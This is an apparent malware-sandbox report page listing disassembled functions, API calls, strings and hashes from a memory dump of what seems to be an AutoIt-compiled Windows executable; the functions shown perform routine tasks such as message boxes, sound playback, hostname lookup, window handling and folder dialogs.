Instruction ID: c23ff9fcbbcb54e93fff7503618b724c058d45d789713b3220626ac07db5d070
Opcode Fuzzy Hash: b2636f443644bb09f36f6761c625a644b35777fd30a6c87bc9dc2cdb97e74b8f
Instruction Fuzzy Hash: F7415C3660024A8FCF14EF10EA65EEF37A4BF11380F155458FC565B292DB319E5ACBA0

Function 00A6F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00A4E2A0,00000010,?,Bad directive syntax error,00A9F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00A6F7C2
LoadStringW.USER32(00000000,?,00A4E2A0,00000010), ref: 00A6F7C9

Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22

_wprintf.LIBCMT ref: 00A6F7FC
__swprintf.LIBCMT ref: 00A6F81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00A6F88D

Strings

Error: , xrefs: 00A6F85B
%s (%d) : ==> %s.: %s %s, xrefs: 00A6F7F7
Line %d:, xrefs: 00A6F818
Line %d (File "%s"):, xrefs: 00A6F833
., xrefs: 00A6F873

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: 66ceeb1ee36c54627c629db10a4eca139ca89f0bfd1887c6b2cd06e142a97d45
Instruction ID: 9261d60d302ad4d6183daa2a0b60d1a83a2d1f38182874d0bf0a8fc25560be09
Opcode Fuzzy Hash: 66ceeb1ee36c54627c629db10a4eca139ca89f0bfd1887c6b2cd06e142a97d45
Instruction Fuzzy Hash: 2421913290421EFFCF11EFA0CD4AEEE7779BF18300F04086AF515660A2EA319668DB51

Function 00A752C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06

Part of subcall function 00A17924: _memmove.LIBCMT ref: 00A179AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00A75330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00A75346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A75357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00A75369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00A7537A

Strings

play PlayMe wait, xrefs: 00A75364
play PlayMe, xrefs: 00A75375
close PlayMe, xrefs: 00A75341, 00A7536E
alias PlayMe, xrefs: 00A75309
open , xrefs: 00A752DF
status PlayMe mode, xrefs: 00A7532B

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 4be8385184a264a6a51f6c5c02c10d40d672f52f9a62362ce415182415975755
Instruction ID: 397ce77eb56cddf7c39aa38dc9b447e57085635dbd2af99efaf26d836179bfb0
Opcode Fuzzy Hash: 4be8385184a264a6a51f6c5c02c10d40d672f52f9a62362ce415182415975755
Instruction Fuzzy Hash: 22118F31E5012979D720B7B1CC5AEFFBBBCFB91B80F004C2AB415A60E1EEA00D45C5A0

Function 00A746B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00A746D2
gethostname.WSOCK32(?,00000100), ref: 00A746EC
gethostbyname.WSOCK32(?), ref: 00A746F9
_wcscpy.LIBCMT ref: 00A74721
_memmove.LIBCMT ref: 00A74734
inet_ntoa.WSOCK32(?), ref: 00A7473F
_strcat.LIBCMT ref: 00A7474D
_wcscpy.LIBCMT ref: 00A74764
WSACleanup.WSOCK32 ref: 00A74772
_wcscpy.LIBCMT ref: 00A74780

Strings

0.0.0.0, xrefs: 00A7471B

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: d2e7c1863a492b2ce369ae99a47b0da846f5782dee54e182be729a6845452f6d
Instruction ID: 07056db05fbc92389c97c93e7f7a7a5fc2ff0dd8591fcbb799c0db8374b7b682
Opcode Fuzzy Hash: d2e7c1863a492b2ce369ae99a47b0da846f5782dee54e182be729a6845452f6d
Instruction Fuzzy Hash: B311E7316001146FDB24AB709C8AEDA77BCEF06711F04C1B6F449D60A1FF719D828B50

Function 00A74F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00A74F7A

Part of subcall function 00A3049F: timeGetTime.WINMM(?,75A4B400,00A20E7B), ref: 00A304A3

Sleep.KERNEL32(0000000A), ref: 00A74FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00A74FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00A74FEC
SetActiveWindow.USER32 ref: 00A7500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00A75019
SendMessageW.USER32(00000010,00000000,00000000), ref: 00A75038
Sleep.KERNEL32(000000FA), ref: 00A75043
IsWindow.USER32 ref: 00A7504F
EndDialog.USER32(00000000), ref: 00A75060

Strings

BUTTON, xrefs: 00A74FDE

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 1bc61423026924374954a944ad5996aab13eb6ab4b21ec491c9710250f808769
Instruction ID: 35ef6931d5b9570e755cd66bbea0c2610bdfbf8466259525742e9d597eb3fa05
Opcode Fuzzy Hash: 1bc61423026924374954a944ad5996aab13eb6ab4b21ec491c9710250f808769
Instruction Fuzzy Hash: AC21CF74701604BFE710DFB0EC88A263B69EB08745F14903AF10BC11B4DF758D528661

Function 00A7D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC

CoInitialize.OLE32(00000000), ref: 00A7D5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00A7D67D
SHGetDesktopFolder.SHELL32(?), ref: 00A7D691
CoCreateInstance.OLE32(00AA2D7C,00000000,00000001,00AC8C1C,?), ref: 00A7D6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00A7D74C
CoTaskMemFree.OLE32(?,?), ref: 00A7D7A4
_memset.LIBCMT ref: 00A7D7E1
SHBrowseForFolderW.SHELL32(?), ref: 00A7D81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00A7D840
CoTaskMemFree.OLE32(00000000), ref: 00A7D847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00A7D87E
CoUninitialize.OLE32(00000001,00000000), ref: 00A7D880

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 0af201b077a6864474e8279c7cd9c1c91993219faf5a1e15806d76ef13e56508
Instruction ID: ac121697811a267e2658e2c4818b777c064d8562a288f16df0e4dae6576f96bf
Opcode Fuzzy Hash: 0af201b077a6864474e8279c7cd9c1c91993219faf5a1e15806d76ef13e56508
Instruction Fuzzy Hash: BFB1D975A00109AFDB04DFA4CD98DAEBBB9FF48314F148469E909EB261DB30EE45CB51

Function 00A6C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00A6C283
GetWindowRect.USER32(00000000,?), ref: 00A6C295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00A6C2F3
GetDlgItem.USER32(?,00000002), ref: 00A6C2FE
GetWindowRect.USER32(00000000,?), ref: 00A6C310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00A6C364
GetDlgItem.USER32(?,000003E9), ref: 00A6C372
GetWindowRect.USER32(00000000,?), ref: 00A6C383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00A6C3C6
GetDlgItem.USER32(?,000003EA), ref: 00A6C3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00A6C3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 00A6C3FE

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 1c2b1d2e642e1b3eb2655204ac3427db80e7ca789888f783723df69b3f691cdf
Instruction ID: f7d41ef104ca564018516c85943289face30cd71d67c3693963f97b3f80df5d3
Opcode Fuzzy Hash: 1c2b1d2e642e1b3eb2655204ac3427db80e7ca789888f783723df69b3f691cdf
Instruction Fuzzy Hash: 3C513F71B00205AFDF18CFA9DD99ABEBBBAEB88711F14812DF615D7290DB709D418B10

Function 00A1201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00A11B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A12036,?,00000000,?,?,?,?,00A116CB,00000000,?), ref: 00A11B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00A120D3
KillTimer.USER32(-00000001,?,?,?,?,00A116CB,00000000,?,?,00A11AE2,?,?), ref: 00A1216E
DestroyAcceleratorTable.USER32(00000000), ref: 00A4BCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A116CB,00000000,?,?,00A11AE2,?,?), ref: 00A4BCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A116CB,00000000,?,?,00A11AE2,?,?), ref: 00A4BCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A116CB,00000000,?,?,00A11AE2,?,?), ref: 00A4BD0A
DeleteObject.GDI32(00000000), ref: 00A4BD1C

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 9f3518a32a6b7d0ca4e584e7e33e4522fe5033c44ca34ccfd8c1fbf2242e533b
Instruction ID: 219e2c04309a22502eb86b8264f32c7c3dfde67b150f8d2e62540f85e315851f
Opcode Fuzzy Hash: 9f3518a32a6b7d0ca4e584e7e33e4522fe5033c44ca34ccfd8c1fbf2242e533b
Instruction Fuzzy Hash: B0617D35A11A00DFCB35DF64D948B6977F2FB84312F14462AE5428A970CB71ECA2EB90

Function 00A121A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00A125DB: GetWindowLongW.USER32(?,000000EB), ref: 00A125EC

GetSysColor.USER32(0000000F), ref: 00A121D3

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 37515370c647926e3c0f2a57e641f1e3a99c32f664741ea7235af38511fabf02
Instruction ID: 1aeda6dddf11300c68c85a9f2d35690170c74bc8f2558a4c292cc9bdc0234cea
Opcode Fuzzy Hash: 37515370c647926e3c0f2a57e641f1e3a99c32f664741ea7235af38511fabf02
Instruction Fuzzy Hash: AD417035200140AEDB259F68DC88BFD3B65EB46331F284366FE658A1E5CB31CC92DB61

Function 00A7A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00A9F910), ref: 00A7A90B
GetDriveTypeW.KERNEL32(00000061,00AC89A0,00000061), ref: 00A7A9D5
_wcscpy.LIBCMT ref: 00A7A9FF

Strings

removable, xrefs: 00A7A93D
ramdisk, xrefs: 00A7A97F
network, xrefs: 00A7A969
all, xrefs: 00A7A911
unknown, xrefs: 00A7A996
cdrom, xrefs: 00A7A927
fixed, xrefs: 00A7A953

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: e12dea641d80a62836a18521bc42690d3193b86bda511b8587c3005462a016c2
Instruction ID: 3e4a6fd2320dfc619dc59e110375144f9c497cc1e6a4a86a8181914115528a85
Opcode Fuzzy Hash: e12dea641d80a62836a18521bc42690d3193b86bda511b8587c3005462a016c2
Instruction Fuzzy Hash: 3D518B31508301ABC704EF14CEA2AAFB7A5FFD4380F55882DF59A572A2DB319949CB53

Function 00A19837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00A19862
__swprintf.LIBCMT ref: 00A198AC
__i64tow.LIBCMT ref: 00A4F5E6

Strings

False, xrefs: 00A4F5AE
True, xrefs: 00A4F5A7
%.15g, xrefs: 00A198A6
0x%p, xrefs: 00A4F5C8

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 0246dd8676a51d9157e5c8b9b4b47389d7f03cea06d3ee4f0ab813f6439cf558
Instruction ID: 685ce78a663c3503e05894df9ecf19bedbc46e52135ec4c5005e06456faa932f
Opcode Fuzzy Hash: 0246dd8676a51d9157e5c8b9b4b47389d7f03cea06d3ee4f0ab813f6439cf558
Instruction Fuzzy Hash: 5641C275A04205AFEB24DF74D952EBAB3F8FF45300F20486EF54AD7292EA319981CB11

Function 00A97152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A9716A
CreateMenu.USER32 ref: 00A97185
SetMenu.USER32(?,00000000), ref: 00A97194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A97221
IsMenu.USER32(?), ref: 00A97237
CreatePopupMenu.USER32 ref: 00A97241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A9726E
DrawMenuBar.USER32 ref: 00A97276

Strings

F, xrefs: 00A97262
0, xrefs: 00A97160

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 3bfc15d34d7a45dcaf2f4a6fe35470bb0d2a0a5147aff35f4d0f6ff8c217f1cb
Instruction ID: 1aa24da0c60ccd1437857dfe92c1cd5405e4ed47ac68ce129c1be1346c7c8e2d
Opcode Fuzzy Hash: 3bfc15d34d7a45dcaf2f4a6fe35470bb0d2a0a5147aff35f4d0f6ff8c217f1cb
Instruction Fuzzy Hash: 81412374A11209EFDB20DFA4D984EDABBF5FB49310F14002AF905AB361DB31A910DBA0

Function 00A974BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00A9755E
CreateCompatibleDC.GDI32(00000000), ref: 00A97565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00A97578
SelectObject.GDI32(00000000,00000000), ref: 00A97580
GetPixel.GDI32(00000000,00000000,00000000), ref: 00A9758B
DeleteDC.GDI32(00000000), ref: 00A97594
GetWindowLongW.USER32(?,000000EC), ref: 00A9759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00A975B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00A975BE

Strings

static, xrefs: 00A974F6

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: f8212d07a8574432b6138483107aa98c3a672046897f52d17ba5860115015b71
Instruction ID: 6206efea90b50aaea2113b254891b9d2fa4c30b48f8b6d2be4e76d31d8b5e70d
Opcode Fuzzy Hash: f8212d07a8574432b6138483107aa98c3a672046897f52d17ba5860115015b71
Instruction Fuzzy Hash: AF316B72215215BFDF129FA4DC49FDA3BA9FF09360F150225FA15E60A0DB31D822DBA4

Function 00A36E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A36E3E

Part of subcall function 00A38B28: __getptd_noexit.LIBCMT ref: 00A38B28

__gmtime64_s.LIBCMT ref: 00A36ED7
__gmtime64_s.LIBCMT ref: 00A36F0D
__gmtime64_s.LIBCMT ref: 00A36F2A
__allrem.LIBCMT ref: 00A36F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A36F9C
__allrem.LIBCMT ref: 00A36FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A36FD1
__allrem.LIBCMT ref: 00A36FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A37006
__invoke_watson.LIBCMT ref: 00A37077

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
